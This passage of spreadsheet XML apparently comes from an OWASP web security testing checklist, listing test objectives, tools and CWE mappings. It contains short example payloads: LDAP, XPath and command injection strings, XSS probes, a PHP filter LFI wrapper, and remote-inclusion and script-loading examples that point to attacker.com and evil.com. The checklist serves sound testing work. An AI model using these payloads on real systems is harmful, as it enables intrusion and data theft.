  </si>
  <si>
    <t>- Identify the type of MFA used by the application.
- Determine whether the MFA implementation is robust and secure.
- Attempt to bypass the MFA.</t>
  </si>
  <si>
    <t>CWE-288
CWE-304
CWE-308</t>
  </si>
  <si>
    <t xml:space="preserve">5. Authorization Testing </t>
  </si>
  <si>
    <t>5.1</t>
  </si>
  <si>
    <t>WSTG-ATHZ-01</t>
  </si>
  <si>
    <t>- Identify injection points that pertain to path traversal.
- Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)</t>
  </si>
  <si>
    <t>CWE-22
CWE-23
CWE-35
CWE-829</t>
  </si>
  <si>
    <t>5.2</t>
  </si>
  <si>
    <t>WSTG-ATHZ-02</t>
  </si>
  <si>
    <t>- Assess if horizontal or vertical access is possible.
- Access to Administrative functions by force browsing (/admin/addUser)</t>
  </si>
  <si>
    <t>CWE-285
CWE-732
CWE-862
CWE-863</t>
  </si>
  <si>
    <t>5.3</t>
  </si>
  <si>
    <t>WSTG-ATHZ-03</t>
  </si>
  <si>
    <t>- Identify injection points related to role/privilege manipulation. For example: Change some param groupid=2 to groupid=1
- Verify that it is not possible for a user to modify their privileges or roles inside the application
- Fuzz or otherwise attempt to bypass security measures.</t>
  </si>
  <si>
    <t>CWE-269
CWE-639</t>
  </si>
  <si>
    <t>5.4</t>
  </si>
  <si>
    <t>WSTG-ATHZ-04</t>
  </si>
  <si>
    <t>- Identify points where object references may occur.
- Assess the access control measures and if they're vulnerable to IDOR. For example: Force changing parameter value (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t>CWE-639</t>
  </si>
  <si>
    <t>5.5</t>
  </si>
  <si>
    <t>WSTG-ATHZ-05</t>
  </si>
  <si>
    <t>- Determine if OAuth2 implementation is vulnerable or using a deprecated or custom implementation.</t>
  </si>
  <si>
    <t>CWE-290
CWE-345
CWE-798</t>
  </si>
  <si>
    <t>6. Session Management Testing</t>
  </si>
  <si>
    <t>6.1</t>
  </si>
  <si>
    <t>WSTG-SESS-01</t>
  </si>
  <si>
    <t>- Gather session tokens, for the same user and for different users where possible.
- Analyze and ensure that enough randomness exists to stop session forging attacks.
- Modify cookies that are not signed and contain information that can be manipulated.</t>
  </si>
  <si>
    <t>A2
A4</t>
  </si>
  <si>
    <t>CWE-315
CWE-330
CWE-539
CWE-694</t>
  </si>
  <si>
    <t>6.2</t>
  </si>
  <si>
    <t>WSTG-SESS-02</t>
  </si>
  <si>
    <t>- Ensure that the proper security configuration is set for cookies (HTTPOnly and Secure flag, Samesite=Strict)</t>
  </si>
  <si>
    <t>CWE-16
CWE-614
CWE-1004
CWE-1275</t>
  </si>
  <si>
    <t>6.3</t>
  </si>
  <si>
    <t>WSTG-SESS-03</t>
  </si>
  <si>
    <t>- Analyze the authentication mechanism and its flow.
- Force cookies and assess the impact.
- Check whether the application renew the cookie after a successfully user authentication.</t>
  </si>
  <si>
    <t>CWE-384</t>
  </si>
  <si>
    <t>6.4</t>
  </si>
  <si>
    <t>WSTG-SESS-04</t>
  </si>
  <si>
    <t>- Ensure that proper encryption is implemented (Encryption &amp; Reuse of session Tokens vulnerabilities).
- Review the caching configuration.
- Assess the channel and methods' security (Send sessionID with GET method ?)</t>
  </si>
  <si>
    <t>CWE-598</t>
  </si>
  <si>
    <t>6.5</t>
  </si>
  <si>
    <t>WSTG-SESS-05</t>
  </si>
  <si>
    <t>- Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user.
- Conduct URL analysis, Direct access to functions without any token.</t>
  </si>
  <si>
    <t>CWE-352</t>
  </si>
  <si>
    <t>6.6</t>
  </si>
  <si>
    <t>WSTG-SESS-06</t>
  </si>
  <si>
    <t>- Assess the logout UI.
- Analyze the session timeout and if the session is properly killed after logout.</t>
  </si>
  <si>
    <t>CWE-613</t>
  </si>
  <si>
    <t>6.7</t>
  </si>
  <si>
    <t>WSTG-SESS-07</t>
  </si>
  <si>
    <t>- Validate that a hard session timeout exists, after the timeout has passed, all session tokens should be destroyed or be unusable.</t>
  </si>
  <si>
    <t>6.8</t>
  </si>
  <si>
    <t>WSTG-SESS-08</t>
  </si>
  <si>
    <t>- Identify all session variables.
- Break the logical flow of session generation.
- Check whether the application uses the same session variable for more than one purpose</t>
  </si>
  <si>
    <t>CWE-841</t>
  </si>
  <si>
    <t>6.9</t>
  </si>
  <si>
    <t>WSTG-SESS-09</t>
  </si>
  <si>
    <t>- Identify vulnerable session cookies.
- Hijack vulnerable cookies and assess the risk level.</t>
  </si>
  <si>
    <t>A2</t>
  </si>
  <si>
    <t>6.10</t>
  </si>
  <si>
    <t>WSTG-SESS-10</t>
  </si>
  <si>
    <t>- Determine whether the JWTs expose sensitive information.
- Determine whether the JWTs can be tampered with or modified.</t>
  </si>
  <si>
    <t>CWE-345
CWE-757
CWE-798</t>
  </si>
  <si>
    <t>7. Data Validation Testing</t>
  </si>
  <si>
    <t>7.1</t>
  </si>
  <si>
    <t>WSTG-INPV-01</t>
  </si>
  <si>
    <t>- Identify variables that are reflected in responses.
- Assess the input they accept and the encoding that gets applied on return (if any).</t>
  </si>
  <si>
    <t>A3</t>
  </si>
  <si>
    <t>CWE-79</t>
  </si>
  <si>
    <t>7.2</t>
  </si>
  <si>
    <t>WSTG-INPV-02</t>
  </si>
  <si>
    <t>- Identify stored input that is reflected on the client-side.
- Assess the input they accept and the encoding that gets applied on return (if any).</t>
  </si>
  <si>
    <t>7.3</t>
  </si>
  <si>
    <t>WSTG-INPV-03</t>
  </si>
  <si>
    <t>N/A, This content has been merged into: WSTG-CONF-06</t>
  </si>
  <si>
    <t>7.4</t>
  </si>
  <si>
    <t>WSTG-INPV-04</t>
  </si>
  <si>
    <t>- Identify the backend and the parsing method used.
- Assess injection points and try bypassing input filters using HPP.</t>
  </si>
  <si>
    <t>CWE-235</t>
  </si>
  <si>
    <t>7.5</t>
  </si>
  <si>
    <t>WSTG-INPV-05</t>
  </si>
  <si>
    <t>- Identify SQL injection points.
- Assess the severity of the injection and the level of access that can be achieved through it.</t>
  </si>
  <si>
    <t>Burpsuite/ZAP SQLMap
NoSQLMap</t>
  </si>
  <si>
    <t>CWE-89</t>
  </si>
  <si>
    <t>7.6</t>
  </si>
  <si>
    <t>WSTG-INPV-06</t>
  </si>
  <si>
    <t>- Identify LDAP injection points:
/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password
- Assess the severity of the injection:</t>
  </si>
  <si>
    <t>CWE-90</t>
  </si>
  <si>
    <t>7.7</t>
  </si>
  <si>
    <t>WSTG-INPV-07</t>
  </si>
  <si>
    <t xml:space="preserve">- Identify XML injection points with XML Meta Characters:
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG
- Assess the types of exploits that can be attained and their severities.
</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Wfuzz</t>
  </si>
  <si>
    <t>CWE-91
CWE-611
CWE-652</t>
  </si>
  <si>
    <t>7.8</t>
  </si>
  <si>
    <t>WSTG-INPV-08</t>
  </si>
  <si>
    <t xml:space="preserve">- Identify SSI injection points (Presense of .shtml extension) with these characters:
&lt; ! # = / . " - &gt; and [a-zA-Z0-9]
- Assess the severity of the injection.
</t>
  </si>
  <si>
    <t>CWE-97</t>
  </si>
  <si>
    <t>7.9</t>
  </si>
  <si>
    <t>WSTG-INPV-09</t>
  </si>
  <si>
    <t>- Identify XPATH injection points by checking for XML error enumeration by supplying a single quote ('):
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t>CWE-91
CWE-643</t>
  </si>
  <si>
    <t>7.10</t>
  </si>
  <si>
    <t>WSTG-INPV-10</t>
  </si>
  <si>
    <t>- Identify IMAP/SMTP injection points (Header, Body, Footer) with special characters (i.e.: \, ‘, “, @, #, !, |)
- Understand the data flow and deployment structure of the system.
- Assess the injection impacts.</t>
  </si>
  <si>
    <t>CWE-147</t>
  </si>
  <si>
    <t>7.11</t>
  </si>
  <si>
    <t>WSTG-INPV-11</t>
  </si>
  <si>
    <t>- Identify injection points where you can inject code into the application. 
- Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource).
- Check RFI from malicious URL 
?page.php?file=http://attacker.com/malicious_page
- Assess the injection severity.</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Liffy
LFImap</t>
  </si>
  <si>
    <t>CWE-22
CWE-94
CWE-95
CWE-98
CWE-829</t>
  </si>
  <si>
    <t>7.12</t>
  </si>
  <si>
    <t>WSTG-INPV-12</t>
  </si>
  <si>
    <t>- Identify and assess the command injection points with special characters (i.e.: | ; &amp; $ &gt; &lt; ' !)
For example: ?doc=Doc1.pdf+|+Dir c:\</t>
  </si>
  <si>
    <t>Burpsuite/ZAP Commix</t>
  </si>
  <si>
    <t>CWE-77
CWE-78</t>
  </si>
  <si>
    <t>7.13</t>
  </si>
  <si>
    <t>WSTG-INPV-13</t>
  </si>
  <si>
    <t>- Assess whether injecting format string conversion specifiers into user-controlled fields causes undesired behavior from the application.</t>
  </si>
  <si>
    <t>Immunity Canvas
Spike
MSF</t>
  </si>
  <si>
    <t>CWE-134</t>
  </si>
  <si>
    <t>7.14</t>
  </si>
  <si>
    <t>WSTG-INPV-14</t>
  </si>
  <si>
    <t>- Identify injections that are stored and require a recall step to the stored injection. (i.e.: CSV Injection, Blind Stored XSS, File Upload)
- Understand how a recall step could occur.
- Set listeners or activate the recall step if possible.</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
BeEF</t>
  </si>
  <si>
    <t>CWE-79
CWE-434
CWE-1236</t>
  </si>
  <si>
    <t>7.15</t>
  </si>
  <si>
    <t>WSTG-INPV-15</t>
  </si>
  <si>
    <t>- Assess if the application is vulnerable to splitting, identifying what possible attacks are achievable.
- Assess if the chain of communication is vulnerable to smuggling, identifying what possible attacks are achievable.</t>
  </si>
  <si>
    <t>A3
A4</t>
  </si>
  <si>
    <t>CWE-93
CWE-113
CWE-444</t>
  </si>
  <si>
    <t>7.16</t>
  </si>
  <si>
    <t>WSTG-INPV-16</t>
  </si>
  <si>
    <t>- Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any suspicious requests.
- Monitor HTTP traffic without changes of end user Browser proxy or client-side application.</t>
  </si>
  <si>
    <t>7.17</t>
  </si>
  <si>
    <t>WSTG-INPV-17</t>
  </si>
  <si>
    <t>- Assess if the Host header is being parsed dynamically in the application.
- Bypass security controls that rely on the header.</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Netcat</t>
  </si>
  <si>
    <t>CWE-74
CWE-116</t>
  </si>
  <si>
    <t>7.18</t>
  </si>
  <si>
    <t>WSTG-INPV-18</t>
  </si>
  <si>
    <t>- Detect template injection vulnerability points.
- Identify the templating engine.
- Build the exploit.</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Tplmap</t>
  </si>
  <si>
    <t>CWE-1336</t>
  </si>
  <si>
    <t>7.19</t>
  </si>
  <si>
    <t>WSTG-INPV-19</t>
  </si>
  <si>
    <t>- Identify SSRF injection points.
- Test if the injection points are exploitable.
- Asses the severity of the vulnerability.</t>
  </si>
  <si>
    <t>A10</t>
  </si>
  <si>
    <t>CWE-918</t>
  </si>
  <si>
    <t>7.20</t>
  </si>
  <si>
    <t>WSTG-INPV-20</t>
  </si>
  <si>
    <t>- Identify requests that modify objects
- Assess if it is possible to modify fields never intended to be modified from outside</t>
  </si>
  <si>
    <t>CWE-915</t>
  </si>
  <si>
    <t>8. Error Handling</t>
  </si>
  <si>
    <t>8.1</t>
  </si>
  <si>
    <t>WSTG-ERRH-01</t>
  </si>
  <si>
    <t>- Identify existing error output (i.e.: Random files/folders (40x)
- Analyze the different output returned.</t>
  </si>
  <si>
    <t>CWE-209
CWE-210
CWE-431
CWE-497
CWE-544
CWE-550
CWE-728</t>
  </si>
  <si>
    <t>8.2</t>
  </si>
  <si>
    <t>WSTG-ERRH-02</t>
  </si>
  <si>
    <t>N/A, This content has been merged into: WSTG-ERRH-01</t>
  </si>
  <si>
    <t>9. Cryptography</t>
  </si>
  <si>
    <t>9.1</t>
  </si>
  <si>
    <t>WSTG-CRYP-01</t>
  </si>
  <si>
    <t>- Validate the server configuration (Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)
- Review the digital certificate's cryptographic strength and validity.
- Ensure that the TLS security is not bypassable and is properly implemented across the application.</t>
  </si>
  <si>
    <t>testssl.sh</t>
  </si>
  <si>
    <t>A2
A7</t>
  </si>
  <si>
    <t>CWE-295
CWE-296
CWE-297
CWE-298
CWE-319
CWE-326
CWE-327
CWE-310
CWE-757</t>
  </si>
  <si>
    <t>9.2</t>
  </si>
  <si>
    <t>WSTG-CRYP-02</t>
  </si>
  <si>
    <t>- Identify encrypted messages that rely on padding.
- Attempt to break the padding of the encrypted messages and analyze the returned error messages for further analysis.</t>
  </si>
  <si>
    <t>PadBuster
POET</t>
  </si>
  <si>
    <t>CWE-326
CWE-649</t>
  </si>
  <si>
    <t>9.3</t>
  </si>
  <si>
    <t>WSTG-CRYP-03</t>
  </si>
  <si>
    <t>- Identify sensitive information transmitted through the various channels.
- Assess the privacy and security of the channels used.
- Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)</t>
  </si>
  <si>
    <t>CWE-311
CWE-319
CWE-523</t>
  </si>
  <si>
    <t>9.4</t>
  </si>
  <si>
    <t>WSTG-CRYP-04</t>
  </si>
  <si>
    <t>- Provide a guideline for the identification weak encryption or hashing uses and implementations.</t>
  </si>
  <si>
    <t>Testssl.sh
Nessus</t>
  </si>
  <si>
    <t>CWE-261
CWE-320
CWE-321
CWE-322
CWE-323
CWE-324
CWE-325
CWE-326
CWE-327
CWE-328
CWE-329
CWE-330
CWE-331
CWE-335
CWE-336
CWE-337
CWE-338
CWE-340
CWE-347
CWE-354
CWE-759
CWE-760
CWE-780
CWE-798
CWE-916</t>
  </si>
  <si>
    <t>10. Business logic Testing</t>
  </si>
  <si>
    <t>10.1</t>
  </si>
  <si>
    <t>WSTG-BUSL-01</t>
  </si>
  <si>
    <t>- Identify data injection points.
- Validate that all checks are occurring on the back end and can't be bypassed.
- Attempt to break the format of the expected data and analyze how the application is handling it.</t>
  </si>
  <si>
    <t>CWE-840</t>
  </si>
  <si>
    <t>10.2</t>
  </si>
  <si>
    <t>WSTG-BUSL-02</t>
  </si>
  <si>
    <t>- Review the project documentation looking for guessable, predictable, or hidden functionality of fields.
- Insert logically valid data in order to bypass normal business logic workflow.</t>
  </si>
  <si>
    <t>10.3</t>
  </si>
  <si>
    <t>WSTG-BUSL-03</t>
  </si>
  <si>
    <t>- Review the project documentation for components of the system that move, store, or handle data.
- Determine what type of data is logically acceptable by the component and what types the system should guard against.
- Determine who should be allowed to modify or read that data in each component.
- Attempt to insert, update, or delete data values used by each component that should not be allowed per the business logic workflow.</t>
  </si>
  <si>
    <t>Burp Proxy</t>
  </si>
  <si>
    <t>CWE-840
CWE-472</t>
  </si>
  <si>
    <t>10.4</t>
  </si>
  <si>
    <t>WSTG-BUSL-04</t>
  </si>
  <si>
    <t>- Review the project documentation for system functionality that may be impacted by time. Such as execution time or actions that
help users predict a future outcome or allow one to circumvent
any part of the business logic or workflow. For example, not
completing transactions in an expected time.
- Develop and execute the mis-use cases ensuring that attackers
can not gain an advantage based on any timing (Race Condition).</t>
  </si>
  <si>
    <t>CWE-840
CWE-362</t>
  </si>
  <si>
    <t>10.5</t>
  </si>
  <si>
    <t>WSTG-BUSL-05</t>
  </si>
  <si>
    <t>- Identify functions that must set limits to the times they can be called.
- Assess if there is a logical limit set on the functions and if it is properly validated.
- For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.</t>
  </si>
  <si>
    <t>A4
A7</t>
  </si>
  <si>
    <t>CWE-799</t>
  </si>
  <si>
    <t>10.6</t>
  </si>
  <si>
    <t>WSTG-BUSL-06</t>
  </si>
  <si>
    <t>- Review the project documentation for methods to skip or go through steps in the application process in a different order from the intended business logic flow.
- Develop a misuse case and try to circumvent every logic flow identified.</t>
  </si>
  <si>
    <t>10.7</t>
  </si>
  <si>
    <t>WSTG-BUSL-07</t>
  </si>
  <si>
    <t>- Generate notes from all tests conducted against the system.
- Review which tests had a different functionality based on aggressive input.
- Understand the defenses in place and verify if they are enough to protect the system against bypassing techniques.
- Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account</t>
  </si>
  <si>
    <t>CWE-693</t>
  </si>
  <si>
    <t>10.8</t>
  </si>
  <si>
    <t>WSTG-BUSL-08</t>
  </si>
  <si>
    <t>- Review the project documentation for file types that are rejected by the system.
- Verify that the unwelcomed file types are rejected and handled safely. Also, check whether the website only check for "Content-type" or file extension.
- Verify that file batch uploads are secure and do not allow any bypass against the set security measures.</t>
  </si>
  <si>
    <t>CWE-434
CWE-602</t>
  </si>
  <si>
    <t>10.9</t>
  </si>
  <si>
    <t>WSTG-BUSL-09</t>
  </si>
  <si>
    <t>- Identify the file upload functionality.
- Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious.
- If documentation is not available then consider what would be appropriate based on the purpose of the application.
- Determine how the uploaded files are processed.
- Obtain or create a set of malicious files for testing.
- Try to upload the malicious files to the application and determine whether it is accepted and processed.</t>
  </si>
  <si>
    <t>CWE-434</t>
  </si>
  <si>
    <t>10.10</t>
  </si>
  <si>
    <t>WSTG-BUSL-10</t>
  </si>
  <si>
    <t>- Determine whether the business logic for the e-commerce functionality is robust.
- Understand how the payment functionality works.
- Determine whether the payment functionality is secure.</t>
  </si>
  <si>
    <t>CWE-472
CWE-602
CWE-807</t>
  </si>
  <si>
    <t>11. Client Side Testing</t>
  </si>
  <si>
    <t>11.1</t>
  </si>
  <si>
    <t>WSTG-CLNT-01</t>
  </si>
  <si>
    <t>- Identify DOM sinks.
- Build payloads that pertain to every sink type. 
For example: #&lt;script&gt;alert('xss')&lt;/script&gt;</t>
  </si>
  <si>
    <t>11.2</t>
  </si>
  <si>
    <t>WSTG-CLNT-02</t>
  </si>
  <si>
    <t>- Identify sinks and possible JavaScript injection points.
For example: ?javascript:alert(1)</t>
  </si>
  <si>
    <t>11.3</t>
  </si>
  <si>
    <t>WSTG-CLNT-03</t>
  </si>
  <si>
    <t>- Identify HTML injection points and assess the severity of the injected content.
For example: page.html?user=&lt;img%20src='aaa'%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>CWE-80</t>
  </si>
  <si>
    <t>11.4</t>
  </si>
  <si>
    <t>WSTG-CLNT-04</t>
  </si>
  <si>
    <t xml:space="preserve">- Identify injection points that handle URLs or paths.
- Assess the locations that the system could redirect to (Open Redirect).
For example: ?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t>CWE-601</t>
  </si>
  <si>
    <t>11.5</t>
  </si>
  <si>
    <t>WSTG-CLNT-05</t>
  </si>
  <si>
    <t>- Identify CSS injection points.
- Assess the impact of the injection.</t>
  </si>
  <si>
    <t>CWE-20</t>
  </si>
  <si>
    <t>11.6</t>
  </si>
  <si>
    <t>WSTG-CLNT-06</t>
  </si>
  <si>
    <t>- Identify sinks with weak input validation.
- Assess the impact of the resource manipulation.
For example: www.victim.com/#http://evil.com/js.js</t>
  </si>
  <si>
    <t>11.7</t>
  </si>
  <si>
    <t>WSTG-CLNT-07</t>
  </si>
  <si>
    <t>- Identify endpoints that implement CORS.
- Ensure that the CORS configuration is secure or harmless.</t>
  </si>
  <si>
    <t>11.8</t>
  </si>
  <si>
    <t>WSTG-CLNT-08</t>
  </si>
  <si>
    <t xml:space="preserve">- Decompile and analyze the application's code.
- Assess sinks inputs and unsafe method usages.
For example: file.swf?lang=http://evil </t>
  </si>
  <si>
    <t>Flare
Flasm
SWF Intruder</t>
  </si>
  <si>
    <t>11.9</t>
  </si>
  <si>
    <t>WSTG-CLNT-09</t>
  </si>
  <si>
    <t>- Understand security measures in place.
- Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.
- Assess how strict the security measures are and if they are bypassable.</t>
  </si>
  <si>
    <t>11.10</t>
  </si>
  <si>
    <t>WSTG-CLNT-10</t>
  </si>
  <si>
    <t>- Identify the usage of WebSockets by inspecting ws:// or wss:// URI scheme.
- Assess its implementation by using the same tests on normal HTTP channels.</t>
  </si>
  <si>
    <t>A2
A3</t>
  </si>
  <si>
    <t>CWE-319
CWE-1347</t>
  </si>
  <si>
    <t>11.11</t>
  </si>
  <si>
    <t>WSTG-CLNT-11</t>
  </si>
  <si>
    <t>- Assess the security of the message's origin.
- Validate that it's using safe methods and validating its input.</t>
  </si>
  <si>
    <t>CWE-1020</t>
  </si>
  <si>
    <t>11.12</t>
  </si>
  <si>
    <t>WSTG-CLNT-12</t>
  </si>
  <si>
    <t>- Determine whether the website is storing sensitive data in client-side storage.
- The code handling of the storage objects should be examined for possibilities of injection attacks, such as utilizing unvalidated input or vulnerable libraries.</t>
  </si>
  <si>
    <t>CWE-312
CWE-313
CWE-315
CWE-922</t>
  </si>
  <si>
    <t>11.13</t>
  </si>
  <si>
    <t>WSTG-CLNT-13</t>
  </si>
  <si>
    <t>- Locate sensitive data across the system.
- Assess the leakage of sensitive data through various techniques.</t>
  </si>
  <si>
    <t>11.14</t>
  </si>
  <si>
    <t>WSTG-CLNT-14</t>
  </si>
  <si>
    <t>CWE-1022</t>
  </si>
  <si>
    <t>12. API Testing</t>
  </si>
  <si>
    <t>12.1</t>
  </si>
  <si>
    <t>WSTG-APIT-01</t>
  </si>
  <si>
    <t>- Assess that a secure and production-ready configuration is deployed.
- Validate all input fields against generic attacks.
- Ensure that proper access controls are applied.</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
GraphSQL Raider</t>
  </si>
  <si>
    <t>CWE-1347</t>
  </si>
  <si>
    <t>Definition</t>
  </si>
  <si>
    <t>Requirement is applicable to mobile App and implemented according to best practices.</t>
  </si>
  <si>
    <t xml:space="preserve">Requirement is applicable to mobile App but not fulfilled. </t>
  </si>
  <si>
    <t>Requirement is not applicable to mobile App.</t>
  </si>
  <si>
    <t>Web Security Testing Guide (WSTG)</t>
  </si>
  <si>
    <t>WSTG - Information Gathering</t>
  </si>
  <si>
    <t>CWE-200 Exposure of Sensitive Information to an Unauthorized Actor</t>
  </si>
  <si>
    <t>CWE-540 Inclusion of Sensitive Information in Source Code</t>
  </si>
  <si>
    <t>CWE-756 Missing Custom Error Page</t>
  </si>
  <si>
    <t>CWE-1104 Use of Unmaintained Third Party Components</t>
  </si>
  <si>
    <t>CWE-1352 Vulnerable and Outdated Components</t>
  </si>
  <si>
    <t>WSTG - Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t>CWE-13 ASP.NET Misconfiguration: Password in Configuration File</t>
  </si>
  <si>
    <t>CWE-117 Improper Output Neutralization for Logs</t>
  </si>
  <si>
    <t>CWE-201 Exposure of Sensitive Information Through Sent Data</t>
  </si>
  <si>
    <t>CWE-223 Omission of Security-relevant Information</t>
  </si>
  <si>
    <t>CWE-264 Permissions, Privileges, and Access Controls (should no longer be used)</t>
  </si>
  <si>
    <t>CWE-284 Improper Access Control</t>
  </si>
  <si>
    <t>CWE-419 Unprotected Primary Channel</t>
  </si>
  <si>
    <t>CWE-425 Direct Request ('Forced Browsing')</t>
  </si>
  <si>
    <t>CWE-436 Interpretation Conflict</t>
  </si>
  <si>
    <t>CWE-489 Active Debug Code</t>
  </si>
  <si>
    <t>CWE-523 Unprotected Transport of Credentials</t>
  </si>
  <si>
    <t>CWE-531 Inclusion of Sensitive Information in Test Code</t>
  </si>
  <si>
    <t>CWE-532 Insertion of Sensitive Information into Log File</t>
  </si>
  <si>
    <t>CWE-538 Insertion of Sensitive Information into Externally-Accessible File or Directory</t>
  </si>
  <si>
    <t>CWE-548 Exposure of Information Through Directory Listing</t>
  </si>
  <si>
    <t>CWE-552 Files or Directories Accessible to External Parties</t>
  </si>
  <si>
    <t>CWE-650 Trusting HTTP Permission Methods on the Server Side</t>
  </si>
  <si>
    <t>CWE-651 Exposure of WSDL File Containing Sensitive Information</t>
  </si>
  <si>
    <t>CWE-673 External Influence of Sphere Definition</t>
  </si>
  <si>
    <t>CWE-732 Incorrect Permission Assignment for Critical Resource</t>
  </si>
  <si>
    <t>CWE-749 Exposed Dangerous Method or Function</t>
  </si>
  <si>
    <t>CWE-778 Insufficient Logging</t>
  </si>
  <si>
    <t>CWE-942 Permissive Cross-domain Policy with Untrusted Domains</t>
  </si>
  <si>
    <t>CWE-1021 Improper Restriction of Rendered UI Layers or Frames</t>
  </si>
  <si>
    <t>CWE1349 Security Misconfiguration</t>
  </si>
  <si>
    <t>WSTG - Identity Management Testing</t>
  </si>
  <si>
    <t>CWE-204 Observable Response Discrepancy</t>
  </si>
  <si>
    <t>CWE-266 Incorrect Privilege Assignment</t>
  </si>
  <si>
    <t>CWE-269 Improper Privilege Management</t>
  </si>
  <si>
    <t>CWE-280 Improper Handling of Insufficient Permissions or Privileges</t>
  </si>
  <si>
    <t>WSTG - Authentication Testing</t>
  </si>
  <si>
    <t>CWE-287 Improper Authentication</t>
  </si>
  <si>
    <t>CWE-288 Authentication Bypass Using an Alternate Path or Channel</t>
  </si>
  <si>
    <t>CWE-290 Authentication Bypass by Spoofing</t>
  </si>
  <si>
    <t>CWE-294 Authentication Bypass by Capture-replay</t>
  </si>
  <si>
    <t>CWE-302 Authentication Bypass by Assumed-Immutable Data</t>
  </si>
  <si>
    <t>CWE-304 Missing Critical Step in Authentication</t>
  </si>
  <si>
    <t>CWE-306 Missing Authentication for Critical Function</t>
  </si>
  <si>
    <t>CWE-307 Improper Restriction of Excessive Authentication Attempts</t>
  </si>
  <si>
    <t>CWE-308 Use of Single-factor Authentication</t>
  </si>
  <si>
    <t>CWE-315 Cleartext Storage of Sensitive Information in a Cookie</t>
  </si>
  <si>
    <t>CWE-521 Weak Password Requirements</t>
  </si>
  <si>
    <t>CWE-522 Insufficiently Protected Credentials</t>
  </si>
  <si>
    <t>CWE-524 Use of Cache Containing Sensitive Information</t>
  </si>
  <si>
    <t>CWE-525 Use of Web Browser Cache Containing Sensitive Information</t>
  </si>
  <si>
    <t>CWE-620 Unverified Password Change</t>
  </si>
  <si>
    <t>CWE-640 Weak Password Recovery Mechanism for Forgotten Password</t>
  </si>
  <si>
    <t>CWE-804 Guessable CAPTCHA</t>
  </si>
  <si>
    <t>CWE-1391 Use of Weak Credentials</t>
  </si>
  <si>
    <t>CWE-1392 Use of Default Credentials</t>
  </si>
  <si>
    <t xml:space="preserve">WSTG - Authorization Testing </t>
  </si>
  <si>
    <t>CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</t>
  </si>
  <si>
    <t>CWE-23 Relative Path Traversal</t>
  </si>
  <si>
    <t>CWE-35 Path Traversal: '.../...//'</t>
  </si>
  <si>
    <t>CWE-285 Improper Authorization</t>
  </si>
  <si>
    <t>CWE-345 Insufficient Verification of Data Authenticity</t>
  </si>
  <si>
    <t>CWE-639 Authorization Bypass Through User-Controlled Key</t>
  </si>
  <si>
    <t>CWE-798 Use of Hard-coded Credentials</t>
  </si>
  <si>
    <t>CWE-829 Inclusion of Functionality from Untrusted Control Sphere</t>
  </si>
  <si>
    <t>CWE-862 Missing Authorization</t>
  </si>
  <si>
    <t>CWE-863 Incorrect Authorization</t>
  </si>
  <si>
    <t>WSTG - Session Management Testing</t>
  </si>
  <si>
    <t>CWE-16 Configuration</t>
  </si>
  <si>
    <t>CWE-330 Use of Insufficiently Random Values</t>
  </si>
  <si>
    <t>CWE-352 Cross-Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t>CWE-384 Session Fixation</t>
  </si>
  <si>
    <t>CWE-539 Use of Persistent Cookies Containing Sensitive Information</t>
  </si>
  <si>
    <t>CWE-598 Use of GET Request Method With Sensitive Query Strings</t>
  </si>
  <si>
    <t>CWE-613 Insufficient Session Expiration</t>
  </si>
  <si>
    <t>CWE-614 Sensitive Cookie in HTTPS Session Without 'Secure' Attribute</t>
  </si>
  <si>
    <t>CWE-694 Use of Multiple Resources with Duplicate Identifier</t>
  </si>
  <si>
    <t>CWE-757 Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')</t>
  </si>
  <si>
    <t>CWE-841 Improper Enforcement of Behavioral Workflow</t>
  </si>
  <si>
    <t>CWE-1004 Sensitive Cookie Without 'HttpOnly' Flag</t>
  </si>
  <si>
    <t>CWE-1275 Sensitive Cookie with Improper SameSite Attribute</t>
  </si>
  <si>
    <t>WSTG - Data Validation Testing</t>
  </si>
  <si>
    <t>CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')</t>
  </si>
  <si>
    <t>CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')</t>
  </si>
  <si>
    <t>CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</t>
  </si>
  <si>
    <t>CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')</t>
  </si>
  <si>
    <t>CWE-90 Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')</t>
  </si>
  <si>
    <t>CWE-91 XML Injection (aka Blind XPath Injection)</t>
  </si>
  <si>
    <t>CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection')</t>
  </si>
  <si>
    <t>CWE-94 Improper Control of Generation of Code ('Code Injection')</t>
  </si>
  <si>
